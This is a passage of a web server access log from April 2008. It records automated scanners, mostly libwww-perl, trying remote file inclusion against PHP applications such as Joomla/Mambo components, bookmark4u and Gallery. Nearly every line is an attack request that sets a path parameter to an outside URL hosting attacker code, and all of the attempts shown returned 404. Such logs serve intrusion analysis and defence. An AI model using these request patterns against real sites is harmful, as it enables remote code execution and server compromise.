200.1.202.61 - - [13/Apr/2008:23:21:47 -0600] "GET /port.php?content=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
80.68.203.22 - - [13/Apr/2008:23:22:19 -0600] "GET /logs/error_log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
80.68.203.22 - - [13/Apr/2008:23:22:20 -0600] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
80.68.203.22 - - [13/Apr/2008:23:22:20 -0600] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
80.68.203.22 - - [13/Apr/2008:23:22:39 -0600] "GET /logs/error_log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
80.68.203.22 - - [13/Apr/2008:23:22:39 -0600] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
80.68.203.22 - - [13/Apr/2008:23:22:39 -0600] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
62.213.195.36 - - [13/Apr/2008:23:22:39 -0600] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.victoriakart.ru/usr/extensions/mambo?? HTTP/1.1" 404 233 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
62.213.195.36 - - [13/Apr/2008:23:22:39 -0600] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.victoriakart.ru/usr/extensions/mambo?? HTTP/1.1" 404 228 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
160.99.12.231 - - [13/Apr/2008:23:23:14 -0600] "GET /logs/error_log.20080330//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://medisana.co.kr/test?? HTTP/1.1" 404 277 "-" "libwww-perl/5.65"
160.99.12.231 - - [13/Apr/2008:23:23:14 -0600] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://medisana.co.kr/test?? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
160.99.12.231 - - [13/Apr/2008:23:23:15 -0600] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://medisana.co.kr/test?? HTTP/1.1" 404 258 "-" "libwww-perl/5.65"
61.6.77.238 - - [13/Apr/2008:23:25:01 -0600] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://lamers.za.pl/cmdaff? HTTP/1.1" 404 248 "-" "libwww-perl/5.65"
200.1.202.61 - - [13/Apr/2008:23:25:09 -0600] "GET /logs/homepage.php?sel=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
200.1.202.61 - - [13/Apr/2008:23:25:09 -0600] "GET /homepage.php?sel=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
91.185.193.111 - - [13/Apr/2008:23:29:09 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
91.185.193.111 - - [13/Apr/2008:23:29:09 -0600] "GET //skin/zero_vote/error.php?dir=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
212.13.42.169 - - [13/Apr/2008:23:29:17 -0600] "GET /logs/error_log.20080406//Neos_Chronos/header.php?base_folder=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
212.13.42.169 - - [13/Apr/2008:23:29:18 -0600] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
212.13.42.169 - - [13/Apr/2008:23:29:21 -0600] "GET /logs/error_log.20080406//Neos_Chronos/header.php?base_folder=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
212.13.42.169 - - [13/Apr/2008:23:29:21 -0600] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
72.10.167.50 - - [13/Apr/2008:23:30:07 -0600] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.allroundhealth.org//images/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
72.10.167.50 - - [13/Apr/2008:23:30:07 -0600] "GET //init_basic.php?GALLERY_BASEDIR=http://www.allroundhealth.org//images/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
212.13.42.169 - - [13/Apr/2008:23:34:25 -0600] "GET /logs/access_log//Neos_Chronos/header.php?base_folder=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 246 "-" "libwww-perl/5.810"
212.13.42.169 - - [13/Apr/2008:23:34:36 -0600] "GET /logs/access_log//Neos_Chronos/header.php?base_folder=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 246 "-" "libwww-perl/5.810"
80.68.203.22 - - [13/Apr/2008:23:35:11 -0600] "GET /logs/access_log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 288 "-" "libwww-perl/5.803"
80.68.203.22 - - [13/Apr/2008:23:35:12 -0600] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 272 "-" "libwww-perl/5.803"
80.68.203.22 - - [13/Apr/2008:23:35:12 -0600] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 277 "-" "libwww-perl/5.803"
80.68.203.22 - - [13/Apr/2008:23:35:17 -0600] "GET /logs/error_log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
85.214.73.237 - - [13/Apr/2008:23:40:30 -0600] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.allroundhealth.org//images/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.803" 85.2